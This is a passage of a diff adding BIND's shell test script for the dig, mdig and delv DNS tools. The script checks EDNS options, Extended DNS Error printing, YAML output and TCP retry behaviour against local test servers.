($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 +subnet=::/0 A a.example > dig.out.test$n 2>&1 || ret=1 + grep "status: NOERROR" < dig.out.test$n > /dev/null || ret=1 + grep "CLIENT-SUBNET: ::/0/0" < dig.out.test$n > /dev/null || ret=1 + grep "10.0.0.1" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +ednsopt=8:00000000 (family=0, source=0, scope=0) ($n)" + ret=0 + dig_with_opts +tcp @10.53.0.2 +ednsopt=8:00000000 A a.example > dig.out.test$n 2>&1 || ret=1 + grep "status: NOERROR" < dig.out.test$n > /dev/null || ret=1 + grep "CLIENT-SUBNET: 0/0/0" < dig.out.test$n > /dev/null || ret=1 + grep "10.0.0.1" < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +ednsopt=8:00030000 (family=3, source=0, scope=0) ($n)" + ret=0 + dig_with_opts +qr +tcp @10.53.0.2 +ednsopt=8:00030000 A a.example > dig.out.test$n 2>&1 || ret=1 + grep "status: FORMERR" < dig.out.test$n > /dev/null || ret=1 + grep "CLIENT-SUBNET: 00 03 00 00" < dig.out.test$n > /dev/null || ret=1 + test "$(grep -c "CLIENT-SUBNET: 00 03 00 00" dig.out.test$n)" -eq 1 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +subnet with prefix lengths between byte boundaries ($n)" + ret=0 + for p in 9 10 11 12 13 14 15; do + dig_with_opts +tcp @10.53.0.2 +subnet=10.53/$p A a.example > dig.out.test.$p.$n 2>&1 || ret=1 + grep "FORMERR" < dig.out.test.$p.$n > /dev/null && ret=1 + grep "CLIENT-SUBNET.*/$p/0" < dig.out.test.$p.$n > /dev/null || ret=1 + check_ttl_range dig.out.test.$p.$n "A" 300 || ret=1 + done + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +sp works as an abbreviated form of split ($n)" + ret=0 + dig_with_opts @10.53.0.3 +sp=4 -t sshfp foo.example > dig.out.test$n || ret=1 + grep " 9ABC DEF6 7890 " < dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "SSHFP" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig -c works ($n)" + ret=0 + dig_with_opts @10.53.0.3 -c CHAOS -t txt version.bind > dig.out.test$n || ret=1 + grep "version.bind. 0 CH TXT" < dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +dscp ($n)" + ret=0 + dig_with_opts @10.53.0.3 +dscp=32 a a.example > /dev/null 2>&1 || ret=1 + dig_with_opts @10.53.0.3 +dscp=-1 a a.example > /dev/null 2>&1 && ret=1 + dig_with_opts @10.53.0.3 +dscp=64 a a.example > /dev/null 2>&1 && ret=1 + #TODO add a check to make sure dig is actually setting the dscp on the query + #we might have to add better logging to named for this + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +ednsopt with option number ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=3 a.example > dig.out.test$n 2>&1 || ret=1 + grep 'NSID: .* ("ns3")' dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking dig +ednsopt with option name ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=nsid a.example > dig.out.test$n 2>&1 || ret=1 + grep 'NSID: .* ("ns3")' dig.out.test$n > /dev/null || ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking ednsopt LLQ prints as expected ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=llq:0001000200001234567812345678fefefefe +qr a.example > dig.out.test$n 2>&1 || ret=1 + pat='LLQ: Version: 1, Opcode: 2, Error: 0, Identifier: 1311768465173141112, Lifetime: 4278124286$' + tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking that dig warns about .local queries ($n)" + ret=0 + dig_with_opts @10.53.0.3 local soa > dig.out.test$n 2>&1 || ret=1 + grep ";; WARNING: .local is reserved for Multicast DNS" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig processes +ednsopt=key-tag and FORMERR is returned ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=key-tag a.example +qr > dig.out.test$n 2>&1 || ret=1 + grep "; KEY-TAG: *$" dig.out.test$n > /dev/null || ret=1 + grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig processes +ednsopt=key-tag:<value-list> ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=key-tag:00010002 a.example +qr > dig.out.test$n 2>&1 || ret=1 + grep "; KEY-TAG: 1, 2$" dig.out.test$n > /dev/null || ret=1 + grep "status: FORMERR" dig.out.test$n > /dev/null && ret=1 + check_ttl_range dig.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig processes +ednsopt=key-tag:<malformed-value-list> and FORMERR is returned ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=key-tag:0001000201 a.example +qr > dig.out.test$n 2>&1 || ret=1 + grep "; KEY-TAG: 00 01 00 02 01" dig.out.test$n > /dev/null || ret=1 + grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig processes +ednsopt=client-tag:value ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=client-tag:0001 a.example +qr > dig.out.test$n 2>&1 || ret=1 + grep "; CLIENT-TAG: 1$" dig.out.test$n > /dev/null || ret=1 + grep "status: FORMERR" dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that FORMERR is returned for a too short client-tag ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=client-tag:01 a.example +qr > dig.out.test$n 2>&1 || ret=1 + grep "; CLIENT-TAG" dig.out.test$n > /dev/null || ret=1 + grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that FORMERR is returned for a too long client-tag ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=client-tag:000001 a.example +qr > dig.out.test$n 2>&1 || ret=1 + grep "; CLIENT-TAG" dig.out.test$n > /dev/null || ret=1 + grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig processes +ednsopt=server-tag:value ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=server-tag:0001 a.example +qr > dig.out.test$n 2>&1 || ret=1 + grep "; SERVER-TAG: 1$" dig.out.test$n > /dev/null || ret=1 + grep "status: FORMERR" dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that FORMERR is returned for a too short server-tag ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=server-tag:01 a.example +qr > dig.out.test$n 2>&1 || ret=1 + grep "; SERVER-TAG" dig.out.test$n > /dev/null || ret=1 + grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that FORMERR is returned for a too long server-tag ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=server-tag:000001 a.example +qr > dig.out.test$n 2>&1 || ret=1 + grep "; SERVER-TAG" dig.out.test$n > /dev/null || ret=1 + grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that Extended DNS Error 0 is printed correctly ($n)" + # First defined EDE code, additional text "foo". + dig_with_opts @10.53.0.3 +ednsopt=ede:0000666f6f a.example +qr > dig.out.test$n 2>&1 || ret=1 + pat='^; EDE: 0 (Other): (foo)$' + tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that Extended DNS Error 24 is printed correctly ($n)" + # Last defined EDE code, no additional text. + dig_with_opts @10.53.0.3 +ednsopt=ede:0018 a.example +qr > dig.out.test$n 2>&1 || ret=1 + pat='^; EDE: 24 (Invalid Data)$' + tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that Extended DNS Error 25 is printed correctly ($n)" + # First undefined EDE code, additional text "foo". + dig_with_opts @10.53.0.3 +ednsopt=ede:0019666f6f a.example +qr > dig.out.test$n 2>&1 || ret=1 + pat='^; EDE: 25: (foo)$' + tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that invalid Extended DNS Error (length 0) is printed ($n)" + # EDE payload is too short + dig_with_opts @10.53.0.3 +ednsopt=ede a.example +qr > dig.out.test$n 2>&1 || ret=1 + pat='^; EDE:$' + tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that invalid Extended DNS Error (length 1) is printed ($n)" + # EDE payload is too short + dig_with_opts @10.53.0.3 +ednsopt=ede:00 a.example +qr > dig.out.test$n 2>&1 || ret=1 + pat='^; EDE: 00 (".")$' + tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + if [ $HAS_PYYAML -ne 0 ] ; then + n=$((n+1)) + echo_i "check that +yaml Extended DNS Error 0 is printed correctly ($n)" + # First defined EDE code, additional text "foo". + dig_with_opts @10.53.0.3 +yaml +ednsopt=ede:0000666f6f a.example +qr > dig.out.test$n 2>&1 || ret=1 + $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE INFO-CODE > yamlget.out.test$n 2>&1 || ret=1 + read -r value < yamlget.out.test$n + [ "$value" = "0 (Other)" ] || ret=1 + $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE EXTRA-TEXT > yamlget.out.test$n 2>&1 || ret=1 + read -r value < yamlget.out.test$n + [ "$value" = "foo" ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that +yaml Extended DNS Error 24 is printed correctly ($n)" + # Last defined EDE code, no additional text. + dig_with_opts @10.53.0.3 +yaml +ednsopt=ede:0018 a.example +qr > dig.out.test$n 2>&1 || ret=1 + $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE INFO-CODE > yamlget.out.test$n 2>&1 || ret=1 + read -r value < yamlget.out.test$n + [ "$value" = "24 (Invalid Data)" ] || ret=1 + $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE EXTRA-TEXT > yamlget.out.test$n 2>&1 && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that +yaml Extended DNS Error 25 is printed correctly ($n)" + # First undefined EDE code, additional text "foo". + dig_with_opts @10.53.0.3 +yaml +ednsopt=ede:0019666f6f a.example +qr > dig.out.test$n 2>&1 || ret=1 + $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE INFO-CODE > yamlget.out.test$n 2>&1 || ret=1 + read -r value < yamlget.out.test$n + [ "$value" = "25" ] || ret=1 + $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE EXTRA-TEXT > yamlget.out.test$n 2>&1 || ret=1 + read -r value < yamlget.out.test$n + [ "$value" = "foo" ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that invalid Extended DNS Error (length 0) is printed ($n)" + # EDE payload is too short + dig_with_opts @10.53.0.3 +yaml +ednsopt=ede a.example +qr > dig.out.test$n 2>&1 || ret=1 + $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE > yamlget.out.test$n 2>&1 || ret=1 + read -r value < yamlget.out.test$n + [ "$value" = "None" ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that invalid +yaml Extended DNS Error (length 1) is printed ($n)" + # EDE payload is too short + dig_with_opts @10.53.0.3 +yaml +ednsopt=ede:00 a.example +qr > dig.out.test$n 2>&1 || ret=1 + $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE > yamlget.out.test$n 2>&1 || ret=1 + read -r value < yamlget.out.test$n + [ "$value" = '00 (".")' ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + fi + + n=$((n+1)) + echo_i "check that dig handles malformed option '+ednsopt=:' gracefully ($n)" + ret=0 + dig_with_opts @10.53.0.3 +ednsopt=: a.example > dig.out.test$n 2>&1 && ret=1 + grep "ednsopt no code point specified" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig gracefully handles bad escape in domain name ($n)" + ret=0 + digstatus=0 + dig_with_opts @10.53.0.3 '\0.' > dig.out.test$n 2>&1 || digstatus=$? + echo digstatus=$digstatus >> dig.out.test$n + test $digstatus -eq 10 || ret=1 + grep REQUIRE dig.out.test$n > /dev/null && ret=1 + grep "is not a legal name (bad escape)" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig -q -m works ($n)" + ret=0 + dig_with_opts @10.53.0.3 -q -m > dig.out.test$n 2>&1 + pat='^;-m\..*IN.*A$' + tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1 + grep "Dump of all outstanding memory allocations" dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking exit code for a retry upon TCP EOF (immediate -> immediate) ($n)" + ret=0 + echo "no_response no_response" | sendcmd 10.53.0.5 + dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 && ret=1 + # Sanity check: ensure ans5 behaves as expected. + [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 2 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking exit code for a retry upon TCP EOF (partial AXFR -> partial AXFR) ($n)" + ret=0 + echo "partial_axfr partial_axfr" | sendcmd 10.53.0.5 + dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 && ret=1 + # Sanity check: ensure ans5 behaves as expected. + [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 2 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking exit code for a retry upon TCP EOF (immediate -> partial AXFR) ($n)" + ret=0 + echo "no_response partial_axfr" | sendcmd 10.53.0.5 + dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 && ret=1 + # Sanity check: ensure ans5 behaves as expected. + [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 2 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking exit code for a retry upon TCP EOF (partial AXFR -> immediate) ($n)" + ret=0 + echo "partial_axfr no_response" | sendcmd 10.53.0.5 + dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 && ret=1 + # Sanity check: ensure ans5 behaves as expected. + [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 2 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking exit code for a retry upon TCP EOF (immediate -> complete AXFR) ($n)" + ret=0 + echo "no_response complete_axfr" | sendcmd 10.53.0.5 + dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 || ret=1 + # Sanity check: ensure ans5 behaves as expected. + [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 1 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking exit code for a retry upon TCP EOF (partial AXFR -> complete AXFR) ($n)" + ret=0 + echo "partial_axfr complete_axfr" | sendcmd 10.53.0.5 + dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 || ret=1 + # Sanity check: ensure ans5 behaves as expected. + [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 1 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking +tries=1 won't retry twice upon TCP EOF ($n)" + ret=0 + echo "no_response no_response" | sendcmd 10.53.0.5 + dig_with_opts @10.53.0.5 example AXFR +tries=1 > dig.out.test$n 2>&1 && ret=1 + # Sanity check: ensure ans5 behaves as expected. + [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 1 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking +retry=0 won't retry twice upon TCP EOF ($n)" + ret=0 + dig_with_opts @10.53.0.5 example AXFR +retry=0 > dig.out.test$n 2>&1 && ret=1 + # Sanity check: ensure ans5 behaves as expected. + [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 1 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig +expandaaaa works ($n)" + ret=0 + dig_with_opts @10.53.0.3 +expandaaaa AAAA ns2.example > dig.out.test$n 2>&1 || ret=1 + grep "ns2.example.*fd92:7065:0b8e:ffff:0000:0000:0000:0002" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig +noexpandaaaa works ($n)" + ret=0 + dig_with_opts @10.53.0.3 +noexpandaaaa AAAA ns2.example > dig.out.test$n 2>&1 || ret=1 + grep "ns2.example.*fd92:7065:b8e:ffff::2" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig default for +[no]expandaaa (+noexpandaaaa) works ($n)" + ret=0 + dig_with_opts @10.53.0.3 AAAA ns2.example > dig.out.test$n 2>&1 || ret=1 + grep "ns2.example.*fd92:7065:b8e:ffff::2" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + + echo_i "check that dig +short +expandaaaa works ($n)" + ret=0 + dig_with_opts @10.53.0.3 +short +expandaaaa AAAA ns2.example > dig.out.test$n 2>&1 || ret=1 + pat='^fd92:7065:0b8e:ffff:0000:0000:0000:0002$' + tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + if [ $HAS_PYYAML -ne 0 ] ; then + n=$((n+1)) + echo_i "check dig +yaml output ($n)" + ret=0 + dig_with_opts +qr +yaml @10.53.0.3 any ns2.example > dig.out.test$n 2>&1 || ret=1 + value=$($PYTHON yamlget.py dig.out.test$n 0 message query_message_data status || ret=1) + [ "$value" = "NOERROR" ] || ret=1 + value=$($PYTHON yamlget.py dig.out.test$n 1 message response_message_data status || ret=1) + [ "$value" = "NOERROR" ] || ret=1 + value=$($PYTHON yamlget.py dig.out.test$n 1 message response_message_data QUESTION_SECTION 0 || ret=1) + [ "$value" = "ns2.example. IN ANY" ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check dig +yaml output of an IPv6 address ending in zeroes ($n)" + ret=0 + dig_with_opts +qr +yaml @10.53.0.3 aaaa d.example > dig.out.test$n 2>&1 || ret=1 + $PYTHON yamlget.py dig.out.test$n 1 message response_message_data ANSWER_SECTION 0 > yamlget.out.test$n 2>&1 || ret=1 + read -r value < yamlget.out.test$n + [ "$value" = "d.example. 300 IN AAAA fd92:7065:b8e:ffff::0" ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + fi + + n=$((n+1)) + echo_i "check that dig +unexpected works ($n)" + ret=0 + dig_with_opts @10.53.0.6 +unexpected a a.example > dig.out.test$n || ret=1 + grep 'reply from unexpected source' dig.out.test$n > /dev/null || ret=1 + grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig +nounexpected works ($n)" + ret=0 + dig_with_opts @10.53.0.6 +nounexpected +tries=1 +time=2 a a.example > dig.out.test$n && ret=1 + grep 'reply from unexpected source' dig.out.test$n > /dev/null || ret=1 + grep "status: NOERROR" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig default for +[no]unexpected (+nounexpected) works ($n)" + ret=0 + dig_with_opts @10.53.0.6 +tries=1 +time=2 a a.example > dig.out.test$n && ret=1 + grep 'reply from unexpected source' dig.out.test$n > /dev/null || ret=1 + grep "status: NOERROR" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig +bufsize=0 disables EDNS ($n)" + ret=0 + dig_with_opts @10.53.0.3 a.example +bufsize=0 +qr > dig.out.test$n 2>&1 || ret=1 + grep "EDNS:" dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig +bufsize=0 +edns sends EDNS with bufsize of 0 ($n)" + ret=0 + dig_with_opts @10.53.0.3 a.example +bufsize=0 +edns +qr > dig.out.test$n 2>&1 || ret=1 + pat='EDNS:.* udp: 0$' + tr -d '\r' < dig.out.test$n | grep -E "$pat" > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig +bufsize restores default bufsize ($n)" + ret=0 + dig_with_opts @10.53.0.3 a.example +bufsize=0 +bufsize +qr > dig.out.test$n 2>&1 || ret=1 + lines1232=`grep "EDNS:.* udp: 1232" dig.out.test$n | wc -l` + lines4096=`grep "EDNS:.* udp: 4096" dig.out.test$n | wc -l` + test $lines1232 -eq 1 || ret=1 + test $lines4096 -eq 1 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig without -u displays 'Query time' in millseconds ($n)" + ret=0 + dig_with_opts @10.53.0.3 a.example > dig.out.test$n 2>&1 || ret=1 + grep ';; Query time: [0-9][0-9]* msec' dig.out.test$n >/dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig -u displays 'Query time' in microseconds ($n)" + ret=0 + dig_with_opts -u @10.53.0.3 a.example > dig.out.test$n 2>&1 || ret=1 + grep ';; Query time: [0-9][0-9]* usec' dig.out.test$n >/dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig +yaml without -u displays timestamps in milliseconds ($n)" + ret=0 + dig_with_opts +yaml @10.53.0.3 a.example > dig.out.test$n 2>&1 || ret=1 + grep 'query_time: !!timestamp ....-..-..T..:..:..\....Z' dig.out.test$n >/dev/null || ret=1 + grep 'response_time: !!timestamp ....-..-..T..:..:..\....Z' dig.out.test$n >/dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that dig -u +yaml displays timestamps in microseconds ($n)" + ret=0 + dig_with_opts -u +yaml @10.53.0.3 a.example > dig.out.test$n 2>&1 || ret=1 + grep 'query_time: !!timestamp ....-..-..T..:..:..\.......Z' dig.out.test$n >/dev/null || ret=1 + grep 'response_time: !!timestamp ....-..-..T..:..:..\.......Z' dig.out.test$n >/dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + +else + echo_i "$DIG is needed, so skipping these dig tests" +fi + +if [ -x "$MDIG" ] ; then + n=$((n+1)) + echo_i "check that mdig handles malformed option '+ednsopt=:' gracefully ($n)" + ret=0 + mdig_with_opts @10.53.0.3 +ednsopt=: a.example > dig.out.test$n 2>&1 && ret=1 + grep "ednsopt no code point specified" dig.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking mdig +multi +norrcomments works for DNSKEY (when default is rrcomments)($n)" + ret=0 + mdig_with_opts +tcp @10.53.0.3 +multi +norrcomments -t DNSKEY example > dig.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" dig.out.test$n && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking mdig +multi +norrcomments works for SOA (when default is rrcomments)($n)" + ret=0 + mdig_with_opts +tcp @10.53.0.3 +multi +norrcomments -t SOA example > dig.out.test$n || ret=1 + grep "; serial" < dig.out.test$n > /dev/null && ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + if [ $HAS_PYYAML -ne 0 ] ; then + n=$((n+1)) + echo_i "check mdig +yaml output ($n)" + ret=0 + mdig_with_opts +yaml @10.53.0.3 -t any ns2.example > dig.out.test$n || ret=1 + value=$($PYTHON yamlget.py dig.out.test$n 0 message response_message_data status || ret=1) + [ "$value" = "NOERROR" ] || ret=1 + value=$($PYTHON yamlget.py dig.out.test$n 0 message response_message_data QUESTION_SECTION 0 || ret=1) + [ "$value" = "ns2.example. IN ANY" ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + fi +else + echo_i "$MDIG is needed, so skipping these mdig tests" +fi + +if [ -x "$DELV" ] ; then + n=$((n+1)) + echo_i "checking delv short form works ($n)" + ret=0 + delv_with_opts @10.53.0.3 +short a a.example > delv.out.test$n || ret=1 + test "$(wc -l < delv.out.test$n)" -eq 1 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv split width works ($n)" + ret=0 + delv_with_opts @10.53.0.3 +split=4 -t sshfp foo.example > delv.out.test$n || ret=1 + grep " 9ABC DEF6 7890 " < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "SSHFP" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +unknownformat works ($n)" + ret=0 + delv_with_opts @10.53.0.3 +unknownformat a a.example > delv.out.test$n || ret=1 + grep "CLASS1[ ][ ]*TYPE1[ ][ ]*\\\\# 4 0A000001" < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "TYPE1" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv -4 -6 ($n)" + ret=0 + delv_with_opts @10.53.0.3 -4 -6 A a.example > delv.out.test$n 2>&1 && ret=1 + grep "only one of -4 and -6 allowed" < delv.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv with IPv6 on IPv4 does not work ($n)" + if testsock6 fd92:7065:b8e:ffff::3 2>/dev/null + then + 